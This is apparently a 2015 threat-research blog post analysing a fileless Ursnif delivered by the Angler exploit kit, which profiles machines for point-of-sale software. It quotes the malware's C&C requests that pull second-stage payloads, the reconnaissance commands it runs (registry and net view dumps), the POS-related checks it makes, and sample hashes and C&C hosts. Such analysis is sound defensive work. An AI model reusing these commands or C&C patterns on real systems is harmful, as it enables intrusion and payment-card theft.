2015-07-05 - Fileless Reco

A fileless Ursnif doing some POS focused reco


Mission Impossible via Brixe63


At begining of June, I noticed a "different" Angler pass.
No drop and Ursnif call backs.

FileLess Angler Pass and Ursnif Callback
Mon, 01 Jun 2015 14:48:06 GMT


I already encountered that "small ursnif" multiple time. In november for instance some 18ko sample pushed in Bedep 380278c243a03c70dba89af2e6d4916f (grabbing a sample doing some IAP like callback - 43fce12aace6e73fc7b1e1117595816e )

Ursnif sent to Bedep infected VM
2014-11-07


and few days later : ff1da0bbfc66762dbc1b2af52425f211

C&C calls in november 2014 :

GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1859056880&type=1
200 OK (text/html)

GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1039729551&type=505
200 OK (text/html) < 2ndStage payload


What is new in that June pass is the Fileless execution of this Ursnif. In that context seeing it making some net view and registry CurrentVersion\Uninstall check

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName > C:\Users\[REDACTED]\AppData\Local\Temp\28096234.TMP"
cmd /C "net.exe view > C:\Users\[REDACTED]\AppData\Local\Temp\28097562.TMP"

before calling C&C made me think this might be reco.

XTea decoded from the PCAP the sample I got was :
a619632af465759a3d3d45f39f988c3f
Running it manually i got him to grab (call &type=505) an Andromeda

Fileless Ursnif calling C&C, Grabbing Andromeda.
Andromeda Calling home.


Upon deeper looks it appears that this Ursnif is doing those kind of checks :

Case one :
- POS/SALE/STORE in the Netview output
- some URL in the cache :
choiceadvantage.com
uhauldealer.com
secure-booker.com
teletracker.com
wupos.westernunion.com
pay1.plugnpay.com
secure.paymentech.com/iterminal/
Case two :
- some entries in the registry :
VeriFone (advertises itself as the "global leader in secure electronic POS solutions")
(there are 2 strings Citrix and XenApp but do not seems to be directly called)

Case three :
- None of these..so "lower value" (for them) machine.

I made some modif in my systems to fall in case one :

Trying to get the attention of the Fileless Ursnif


And as expected it's something else than Andromeda that got dropped (c&c call with &type=555) on the machine

76c240311df959961200a20f52b4026c which appears to be a signed



Signed Dll dropped by the Fileless Ursnif

 and decided to stand on the drive version of itself.

Conclusion: another smart use of the fileless capabilities of Angler.

Side Note:
It seems type 666 and type 922 are other accepted call by the C&C (one of them might be Verifone case)

Crafted C&C Calls - note:  type 666 and 922

Fiddler for those who can decrypt the traffic based on the Key is in the package (i'd be happy to hear about it )

Here is a package (multiple samples/pcap/fiddler)
Fileless Angler EK Pass (Pcap associated to first Screenshot )

[Update : 2015-09-04]
It's pushed via Bedep those day :
Fileless Ursnif pushed via Bedep but again no drop on disc (new to me method in bedep)
2015-09-04
Sample : d8e950506fcb4617ef3bbcb16c4fba24
C&C : lokingforrealest.net (82.211.31.126)
/yuppi/?user=c54acfbc9b5eef3b729f4025323a731c&id=19&ver=119&os=170393861&os2=512&host=0&k=88401496&type=505

31400 | 82.211.0.0/18 | ACCELERATED | DE | kundenbetreuung.org | IP-Projects GmbH & Co. KG
[/edit]


Thanks :
Will Metcalf, Horgh_RCE and FoxIT for help/inputs.

Post Publication Readings :
Threat actor leverages windows zero-day exploit in payment card data attacks - 2016-05-10 - FireEye
PowerSniff Malware Used in Macro-based Attacks - 2016-03-11 - Palot Alto
Angler Exploit Kit Used to Find and Infect PoS Systems - 2015-07-27 - TrendMicro